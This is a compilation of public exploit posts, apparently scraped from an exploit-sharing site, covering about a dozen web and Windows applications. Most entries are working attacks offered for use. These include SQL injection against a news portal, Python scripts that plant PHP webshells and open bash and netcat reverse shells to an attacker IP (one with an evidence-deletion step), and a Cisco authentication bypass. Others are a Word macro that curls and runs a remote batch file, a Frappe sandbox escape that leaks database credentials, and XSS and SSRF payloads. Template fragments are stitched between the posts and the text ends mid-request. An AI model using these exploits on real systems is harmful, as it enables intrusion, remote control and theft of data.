----------------------------------------------------------------------------------------------------------------------- POST /newsportal/admin/ HTTP/1.1 Host: 127.0.0.1 Content-Length: 42 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/newsportal/admin/ Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 Connection: close username=admin'&password=Test%40123&login= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 11:00:53 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 505 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13 Stack trace: #0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...') #1 {main} thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br /> ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/admin/ HTTP/1.1 Host: 127.0.0.1 Content-Length: 43 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/newsportal/admin/ Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 Connection: close username=admin''&password=Test%40123&login= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 11:02:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 4733 Connection: close Content-Type: text/html; charset=UTF-8 <script>alert('Invalid Details');</script> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="News Portal."> <meta name="author" content="PHPGurukul"> <!-- App title --> <title>News Portal | Admin Panel</title> [...]
HireHackking

Icinga Web 2.10 - Authenticated Remote Code Execution

HACKER · %s · %s

#!/usr/bin/env python3 # Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution # Date: 8/07/2023 # Exploit Author: Dante Corona(Aka. cxdxnt) # Software Link: https://github.com/Icinga/icingaweb2 # Vendor Homepage: https://icinga.com/ # Software Link: https://github.com/Icinga/icingaweb2 # Version: <2.8.6, <2.9.6, <2.10 # Tested on: Icinga Web 2 Version 2.9.2 on Linux # CVE: CVE-2022-24715 # Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715 import requests,argparse,re,random,string from colorama import Fore,Style def letter_random(): letras = string.ascii_lowercase character_random = random.choices(letras, k=6) return ''.join(character_random) def users_url_password(): parser = argparse.ArgumentParser(description='Descripción de tu programa.') parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima') parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user') parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password') parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP') parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT') args = parser.parse_args() url = args.url user = args.user password=args.password ip_attack = args.ip port_attack = args.port return url,user,password,ip_attack,port_attack def login(url,user,password): try: login_url = url + "/icingaweb2/authentication/login" session = requests.Session() r = session.get(login_url) csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] data_post = {"username":user, "password":password, "CSRFToken":csrf_regex, "formUID":"form_login", "btn_submit":"Login" } response = session.post(login_url,data=data_post) if "Welcome to Icinga Web!" in response.text: print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.") r = session.get(login_url) else: print("[!]Failed to login.") exit(1) #return session,csrf_regex except requests.exceptions.InvalidURL: print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(") exit(1) return session,csrf_regex def upload_file(session,url,character_random,csrf_regex): webshell = f"""-----BEGIN RSA PRIVATE KEY----- MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7 9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs /5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00 -----END RSA PRIVATE KEY----- <?php system($_REQUEST["%s"]);?> """%character_random upload_url = url + "/icingaweb2/config/createresource" r = session.get(upload_url) csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] data_post ={"type":"ssh", "name":"shm/"+character_random, "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php", "private_key":webshell, "formUID":"form_config_resource", "CSRFToken":csrf, "btn_submit":"Save Changes" } upload_response = session.post(upload_url,data=data_post) check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php") if check.status_code != 200 : print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(") exit(1) else: print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.") def enable_module(session,url,character_random): url_module = url+"/icingaweb2/config/general" r_module = session.get(url_module) csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0] data_post = {"global_show_stacktraces":"0", "global_show_stacktraces":"1", "global_show_application_state_messages":"0", "global_show_application_state_messages":"1", "global_module_path":"/dev/shm/", "global_config_resource":"icingaweb2", "logging_log":"none", "themes_default":"Icinga", "themes_disabled":"0", "authentication_default_domain":"", "formUID":"form_config_general", "CSRFToken":f"{csrf_module}", "btn_submit":"Save Changes" } resul = session.post(url_module,data_post) #-------------------------------------------------- url_enable = url +"/icingaweb2/config/moduleenable" r_enable = session.get(url_enable) csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0] data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"} resul_enable = session.post(url_enable,data_enable) def reverse_shell(session,url,ip_attack,port_attack,character_random): reverse_url = url + "/icingaweb2/dashboard" reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}' reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &" reverse_response_one = session.get(reverse_exe_one) try: reverse_response_two = session.get(reverse_exe_two, timeout=5) except: print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence") remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}") disable_url = url + "/icingaweb2/config/moduledisable" r_disable = session.get(disable_url) csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0] data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"} response_disable = session.post(disable_url,data=data_disable) def disable_module(session,url,character_random): url_disable = url + "/icingaweb2/config/moduledisable" if __name__ == '__main__': character_random = letter_random() url,user,password,ip_attack,port_attack = users_url_password() session,csrf_regex = login(url,user,password) upload_file(session,url,character_random,csrf_regex) enable_module(session,url,character_random) reverse_shell(session,url,ip_attack,port_attack,character_random)
HireHackking

Admidio v4.2.10 - Remote Code Execution (RCE)

HACKER · %s · %s

Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE) Application: Admidio Version: 4.2.10 Bugs: RCE Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 10.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to account 2. Go to Announcements 3. Add Entry 4. Upload .phar file in image upload section. .phar file Content <?php echo system('cat /etc/passwd');?> 5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar ) Request: POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1 Host: localhost Content-Length: 378 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB Connection: close ------WebKitFormBoundaryne9TRuC1tAqhR86r Content-Disposition: form-data; name="upload"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system('cat /etc/passwd');?> ------WebKitFormBoundaryne9TRuC1tAqhR86r Content-Disposition: form-data; name="ckCsrfToken" o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB ------WebKitFormBoundaryne9TRuC1tAqhR86r--
HireHackking

Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

HACKER · %s · %s

[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass [+] Cisco IMC Supervisor - < 2.2.1.0 [+] Date: 08/21/2019 [+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo [+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html [+] Vulnerability Discovery : Pedro Ribeiro [+] Exploit Author: Fatih Sencer [+] CVE: CVE-2019-1937 ---------------------------------------------------- Usage: ./python3 CiscoIMC-Bypass.py -u host [+] Target https://xxxxxx.com [+] Target OK [+] Exploit Succes [+] Login name : admin [+] Cookie : REACTED """ import argparse,requests,warnings,base64,json,random,string from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) def init(): parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass') parser.add_argument('-u','--host',help='Host', type=str, required=True) args = parser.parse_args() exploit(args) def exploit(args): session = requests.Session() headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)", "X-Requested-With": "XMLHttpRequest", "Referer": "https://{}/".format(args.host), "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)), "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)) } target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host) print("[+] Target {}".format(args.host)) exp_send = session.get(target, headers=headers, verify=False, timeout=10) if exp_send.status_code == 200: print("[+] Target OK") body_data = json.loads(exp_send.text) if not (body_data.get('loginName') is None): print("[+] Exploit Succes") print("[+] Login name : {}".format(body_data.get('loginName'))) print("[+] Cookie : {}".format(session.cookies.get_dict())) else: print("[-] Exploit Failed") else: print("[-] N/A") exit() if __name__ == "__main__": init()
HireHackking

Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05-07-2023 # Exploit Author: Omer Shaik (unknown_exploit) # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/ # Version: Gila 1.10.9 # Tested on: Linux import requests from termcolor import colored from urllib.parse import urlparse # Print ASCII art ascii_art = """ ██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗ ██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝ ██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ ██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ ╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ by Unknown_Exploit """ print(colored(ascii_art, "green")) # Prompt user for target URL target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ") # Extract domain from target URL parsed_url = urlparse(target_url) domain = parsed_url.netloc target_url_2 = f"http://{domain}/" # Prompt user for login credentials username = input("Enter the email: ") password = input("Enter the password: ") # Create a session and perform login session = requests.Session() login_payload = { 'action': 'login', 'username': username, 'password': password } response = session.post(target_url, data=login_payload) cookie = response.cookies.get_dict() var1 = cookie['PHPSESSID'] var2 = cookie['GSESSIONID'] # Prompt user for local IP and port lhost = input("Enter the local IP (LHOST): ") lport = input("Enter the local port (LPORT): ") # Construct the payload payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f" payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}" # Perform file upload using POST request upload_url = f"{target_url_2}fm/upload" upload_headers = { "Host": domain, "Content-Length": "424", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2", "Accept": "*/*", "Origin": target_url_2, "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}", "Connection": "close" } upload_data = f''' ------WebKitFormBoundarynKy5BIIJQcZC80i2 Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7" Content-Type: application/x-php <?php system($_GET["cmd"]);?> ------WebKitFormBoundarynKy5BIIJQcZC80i2 Content-Disposition: form-data; name="path" tmp ------WebKitFormBoundarynKy5BIIJQcZC80i2 Content-Disposition: form-data; name="g_response" content ------WebKitFormBoundarynKy5BIIJQcZC80i2-- ''' upload_response = session.post(upload_url, headers=upload_headers, data=upload_data) if upload_response.status_code == 200: print("File uploaded successfully.") # Execute payload response = session.get(payload_url) print("Payload executed successfully.") else: print("Error uploading the file:", upload_response.text)
HireHackking

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) # Exploit Author: tmrswrr # Vendor Homepage: https://decapcms.org/docs/intro/ # Software Link: https://github.com/decaporg/decap-cms # Version: 2.10.192 # Tested on: https://cms-demo.netlify.com Description: 1. Go to new post and write body field your payload: https://cms-demo.netlify.com/#/collections/posts Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe> 2. After save it XSS payload will executed and see alert box
HireHackking
## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution ## Author: nu11secur1ty ## Date: 07.07.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://outlook.live.com/owa/ ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-33131 ## Description: In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content to everyone who using the Outlook app, no matter web or local. Microsoft still doesn't have a patch against this 0-day vulnerability today. ## Staus: HIGH Vulnerability [+]Exploit: - The malicious Word file: ```js Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html) ## Time spend: 00:30:00
HireHackking
# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.7 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36164 # PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto C:\Users>sc qc MTAgentService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTAgentService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTAgentService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation
HireHackking

Ateme TITAN File 3.9 - SSRF File Enumeration

HACKER · %s · %s

#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration #Exploit Author: LiquidWorm Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.9.12.4 3.9.11.0 3.9.9.2 3.9.8.0 Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing. Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application. Tested on: Microsoft Windows NodeJS Ateme KFE Software Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5781 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php 22.04.2023 -- curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ -H "User-Agent: sunee-mode" \ "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>" Call to file://C:\\windows\\system.ini returned 0 --- HTTP from Server ---------------- POST / HTTP/1.1 Host: ssrftest.zeroscience.mk Accept: */* Content-Type: application/xml Content-Length: 192 <?xml version='1.0' encoding='UTF-8' ?> <update> <id>0000</id> <name>dummy test job</name> <status>aborted</status> <progress>50</progress> <message>message</message> </update>
HireHackking
# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) # Exploit Author: Sander Ferdinand # Date: 2023-06-07 # Version: 13.4.0 # Vendor Homepage: http://erpnext.org # Software Link: https://github.com/frappe/frappe/ # Tested on: Ubuntu 22.04 # CVE : none Silly sandbox escape. > Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts. Requirements: - 'System Manager' role (which is not necessarily the admin) - Server config `server_script_enabled` set to `true` (likely) Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload. ```python3 hax = "echo pwned > /tmp/pwned" g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,)) for x in g:0 ``` Context: - https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/ - https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6 - https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script - https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42 Bonus: More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`: ```python3 hax = """ {g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf} """.strip() g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,)) for x in g:0 ``` Which prints the Frappe config like database/redis credentials, etc. In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.
HireHackking

Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"

HACKER · %s · %s

# Exploit Title: Game Jackal Server v5 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.allradiosoft.ru # Software Link: https://www.allradiosoft.ru/en/ss/index.htm # Version: 5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36166 #PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto C:\Users>sc qc GJServiceV5 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GJServiceV5 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Game Jackal Server v5 DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation
HireHackking
# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.avg.com # Software Link: https://www.avg.com/en-ww/homepage#pc # Version: 7.5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36167 #PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto C:\Users>sc qc "AVG Anti-Spyware Guard" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AVG Anti-Spyware Guard TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AVG Anti-Spyware Guard DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation
HireHackking

ProjeQtOr Project Management System v10.4.1 - Multiple XSS

HACKER · %s · %s

Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS Version: V10.4.1 Bugs: Multiple XSS Technology: PHP Vendor URL: https://www.projeqtor.org Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download Date of found: 09.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken= payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E ### XSS-2 ### steps: 1. login to account 2. go projects and create project 3.add attachment 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg ) ### XSS-3 ### Go to below adress (post request) POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1 Host: localhost Content-Length: 35 sec-ch-ua: Content-Type: 